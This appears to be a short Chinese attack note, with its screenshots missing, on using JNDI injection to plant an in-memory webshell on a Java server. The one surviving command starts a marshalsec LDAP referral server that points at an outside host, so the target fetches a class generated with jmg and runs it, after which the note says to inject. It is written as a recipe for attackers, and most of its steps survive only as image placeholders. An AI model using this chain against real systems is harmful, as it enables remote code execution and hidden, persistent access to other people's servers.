JNDI注入打内存马

方法一

以下两处类名需保持一致

image-20240329193616538

image-20240329193903563

image 2

image 3

方法二

jmg生成class文件

image 4

上传vps起一个http服务

image 5

起ldap服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec.jndi.LDAPRefServer "http://8.141.3.125:9999/#qaxnb" 7777

image 6

直接注入

image 7